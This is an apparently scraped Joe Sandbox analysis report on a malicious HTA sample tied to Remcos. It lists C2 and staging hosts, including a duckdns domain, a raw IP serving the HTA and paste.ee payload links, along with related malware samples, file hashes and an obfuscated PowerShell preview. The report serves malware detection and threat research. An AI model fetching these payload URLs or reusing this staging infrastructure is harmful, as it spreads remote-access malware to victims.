                                                                                        https://secure.gravatar.compowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://themes.googleusercontent.compowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            107.173.143.10
                                                                                            newglobalfucntioninside.duckdns.orgUnited States
                                                                                            36352AS-COLOCROSSINGUSfalse
                                                                                            192.210.150.24
                                                                                            unknownUnited States
                                                                                            36352AS-COLOCROSSINGUStrue
                                                                                            151.101.1.137
                                                                                            cloudinary.map.fastly.netUnited States
                                                                                            54113FASTLYUSfalse
                                                                                            104.21.84.67
                                                                                            paste.eeUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1574256
                                                                                            Start date and time:2024-12-13 07:37:25 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 8m 49s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:13
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:creamkissingthingswithcreambananapackagecreamy.hta
                                                                                            Detection:MAL
                                                                                            Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 75%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 53
                                                                                            • Number of non-executed functions: 183
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .hta
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target mshta.exe, PID 7156 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            01:38:20API Interceptor116x Sleep call for process: powershell.exe modified
                                                                                            01:39:29API Interceptor3787076x Sleep call for process: CasPol.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            107.173.143.10Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                              192.210.150.24Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                              • 192.210.150.24/55/crm/creamkissingthingswithcreambananapackagecreamy.hta
                                                                                              151.101.1.137Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                  nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                    Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                      Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                          16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                                              nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                                  104.21.84.67Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                                  • paste.ee/d/GXRLA
                                                                                                                  nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                                  • paste.ee/d/81FCf
                                                                                                                  Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • paste.ee/d/MQJcS
                                                                                                                  Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • paste.ee/d/u4bvR
                                                                                                                  rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • paste.ee/d/SDfNF
                                                                                                                  Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • paste.ee/d/enGXm
                                                                                                                  Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • paste.ee/d/wXm0Y
                                                                                                                  SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • paste.ee/d/eA3FM
                                                                                                                  dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                                                  • paste.ee/d/JZHbW
                                                                                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                  • paste.ee/d/kmRFs
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  cloudinary.map.fastly.netCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 151.101.129.137
                                                                                                                  Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.1.137
                                                                                                                  stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                  • 151.101.193.137
                                                                                                                  nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 151.101.1.137
                                                                                                                  invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 151.101.65.137
                                                                                                                  Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.1.137
                                                                                                                  Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                  • 151.101.129.137
                                                                                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                  • 151.101.129.137
                                                                                                                  New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 151.101.193.137
                                                                                                                  NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.65.137
                                                                                                                  newglobalfucntioninside.duckdns.orgCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 107.173.143.10
                                                                                                                  paste.eeCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 188.114.97.6
                                                                                                                  SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.97.6
                                                                                                                  Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.96.6
                                                                                                                  print preview.jsGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.187.200
                                                                                                                  nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 188.114.97.6
                                                                                                                  Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.97.6
                                                                                                                  PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.97.6
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.129.91
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.129.91
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.193.91
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.129.91
                                                                                                                  http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                                  • 151.101.194.137
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.129.91
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.129.91
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.1.91
                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                  • 151.101.193.91
                                                                                                                  file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                  • 185.199.111.133
                                                                                                                  AS-COLOCROSSINGUSCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 192.210.150.24
                                                                                                                  SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 23.95.235.29
                                                                                                                  SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 192.210.150.17
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 172.245.142.60
                                                                                                                  nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 192.3.101.149
                                                                                                                  AS-COLOCROSSINGUSCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                  • 192.210.150.24
                                                                                                                  SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  • 23.95.235.29
                                                                                                                  SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 192.210.150.17
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                  • 107.172.44.175
                                                                                                                  nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 172.245.142.60
                                                                                                                  nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                  • 192.3.101.149
                                                                                                                  CLOUDFLARENETUShttps://link.mail.beehiiv.com/ls/click?upn=u001.R74aO5UQ-2FrUOGP4XJV77OKQT1NAU9BwQ6OP1zvOna2j3qRTjcdTYAqprTXNbU1vrKPOdnlpDlbO1ohrNKAkzUmdLI4l19yBq8cKvYb8dsNKK6IsO0404WADpCgMHJK-2BM7ePj1I7t27EBUyeaiqRuwqngyTjrFDMwzKEm6VF8ExY0iFbvMWKjDk4Y7upRdq5sSY4nXTsFeij7Q5E2ydkS65V1Y39RLDjY80Udth17NgVFYK9r3RCAH09UYk2CIjxFd5I9_j6TOopR0rmB-2FAe-2FAtMIxxpgCP1uVymDZ2Ai3kvTmy94R9Cva2dqhTbcrX0jwqqIbWEZoY75Qxv0d-2Fi-2BJ58G8TpFK32hJ3Y6KvVmw024fgWikUvw7JSpe1p1AxJouHIwzH-2B4WSy6DMsQxGcoT2TOfGxh3ObD4vtK9CAXwy7Cjhf2-2FwG571nv3bia-2F44CMLr9lsCQcs3SwvYIDQ24Nq6VfvIfUFJ9nNyI7I5MS5J8-2Bg5rLnAjlWoLmJBScJaNhqffuqYHWE3BYOKju8i7o1wD6Pw-2Fs92sFC2Mh7Oi9oheY1ZKD714qAu5jG5ZYhyhfMgCcuyNvp15ZI4Srd3AOfDL686JQJNBXoqAuLGHc3y6muY0dxN9oNJrp8vksovnjs-2Be8S30MoUUfcAPp8UPZjIomKd3EBkrVIa3k8AgkBS-2BZFp3F1x23PdTLWCU-2BZmxkQxWtGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.90.56
                                                                                                                  https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2F-2BIG8MDRxPU9Yn0AWIxVL0SnsGrwak4PiVtMHHZHgth0QvNVoRM6ZTwXBytJNkde3jx-2F-2Fb-2FvT1Ap71VQ1QzJzKA-3D-3DWb3t_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTV637p-2F932w2jeo6Q6M5CBc8nQ-2BvnbtLXdWgwvebkWZFeKaDHxfFr3YWnPUF1sWMZ4N238r82opSIcsBiifBW-2Fr-2FX6QykqaNBEmm5OGxvGQOo2rDQ3a45-2FO4v08XQIdNTDu5CkpvASiHt5MqJZ9OHD4Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.90.56
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 104.21.35.43
                                                                                                                  http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.196.220
                                                                                                                  https://grupoescobar.com.br/AA/auth.html#yk.cho@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                  • 172.67.139.78
                                                                                                                  CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.34.183
                                                                                                                  CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.34.183
                                                                                                                  http://sourceforge.net/projects/nircmd/files/nircmd-x64.zip/downloadGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.5.227
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                  • 104.21.79.7
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  ShareGate.24.12.1.msiGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  full.exeGet hashmaliciousQuasarBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.84.67
                                                                                                                  • 151.101.1.137
                                                                                                                  No context
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3221), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):153904
                                                                                                                  Entropy (8bit):3.7916333313217825
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:gyGYXHM6cErfuTpT7BgyGYXHM6cErfuTpT1gyGYXHM6cErfuTpT7:7GErSN7B7GErSN17GErSN7
                                                                                                                  MD5:716D2EDD830102BBBAD2CB0A1A0259F1
                                                                                                                  SHA1:720D2DB1E6C8162F89376D06F149237AD8269297
                                                                                                                  SHA-256:5A110B1E0B3424A297618863FFA88A2DE1F09C266687F93DA8E3D7C6DAB48341
                                                                                                                  SHA-512:EDC3624E8071E058981BF47598B654321846A4538D4F64826457108431584021CA901C16278AB74775EF64A377387427A03CD4592B711F624C463BCDB53986CA
                                                                                                                  Malicious:false
                                                                                                                  Preview:...... . . . .....W.O.i.K.t.G.C.e.K.u.h.I.k.i.A. .=. .".d.R.q.n.d.r.W.o.a.W.i.W.K.z.O.".....P.x.k.m.h.A.s.B.t.K.W.K.I.L.h. .=. .".L.k.h.e.I.Q.U.W.W.A.e.Q.z.U.K.".....c.A.O.k.K.j.x.m.L.K.m.k.G.c.T. .=. .".e.Z.G.K.U.m.G.q.U.C.i.G.K.a.i.".........i.K.G.b.j.f.S.p.Z.L.W.J.j.p.m. .=. .".G.c.a.W.K.u.b.g.g.n.G.L.C.P.p.".....O.s.f.L.i.i.W.I.L.u.K.c.n.k.S. .=. .".U.A.c.p.i.d.i.k.K.J.W.h.h.W.m.".....e.f.K.q.p.i.L.f.h.K.L.A.h.c.P. .=. .".m.z.W.U.h.W.Z.z.o.t.p.B.O.W.K.".....e.I.f.e.q.o.L.B.N.Z.K.N.b.d.G. .=. .".J.P.W.a.G.q.C.A.G.N.H.h.p.Z.k.".....k.A.x.g.n.b.i.L.n.z.G.R.c.v.S. .=. .".o.B.W.C.Z.N.u.G.h.p.z.c.f.H.c.".....G.k.U.z.b.L.B.f.Q.z.N.p.f.L.L. .=. .".b.O.i.N.p.L.U.A.h.u.K.f.G.b.c.".....W.p.e.e.i.j.J.i.N.L.C.a.k.a.G. .=. .".W.q.L.p.U.P.a.i.W.K.j.W.d.N.i.".....U.a.K.r.K.W.i.p.O.Z.x.o.o.B.s. .=. .".z.W.A.c.L.U.r.m.z.I.L.e.m.O.U.".....G.k.P.N.G.f.z.z.a.i.t.O.i.L.n. .=. .".q.r.L.A.k.W.U.b.L.g.b.a.i.L.G.".....A.B.j.T.f.j.C.P.W.l.h.u.s.a.U. .=. .".W.L.P.b.U.h.K.K.i.N.S.L.A.U.H.".....m.G.e.K.f.d.t.d.
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5829
                                                                                                                  Entropy (8bit):4.901113710259376
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                  MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                  SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                  SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                  SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1144
                                                                                                                  Entropy (8bit):5.290848674040258
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
                                                                                                                  MD5:374272AB01A3AD6B586FC209D47F884D
                                                                                                                  SHA1:8C785EB3C085C24C140A197D553DE29B3AF5628A
                                                                                                                  SHA-256:FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
                                                                                                                  SHA-512:4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Fri Dec 13 07:46:06 2024, 1st section name ".debug$S"
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1340
                                                                                                                  Entropy (8bit):4.000648188505196
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:HfiK9oVaO5eaHuwKcjmfwI+ycuZhNCakSaPNnqSed:/wIwtK2mo1ulCa3WqS+
                                                                                                                  MD5:93C5AF888DB008D12101559289AB1775
                                                                                                                  SHA1:FFDB67D4BD5A4A142DC3723FC548DC8D64976DE4
                                                                                                                  SHA-256:F6ACE27A9424C331536B5AB358C65D5DB6A094C1DC474C2BE56F7229DEF82AA6
                                                                                                                  SHA-512:3133A9AC880D0AAD805A8E32B958E489BD1C02447E64BE305BF361E638D10CB23128725EF4AE3041D448AC9A42E312A353F25242C7210AF7007B4836D08BFF2A
                                                                                                                  Malicious:false
                                                                                                                  Preview:L...>.[g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP..................a..%...m?....2..........7.......C:\Users\user\AppData\Local\Temp\RES5305.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.1.w.u.0.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
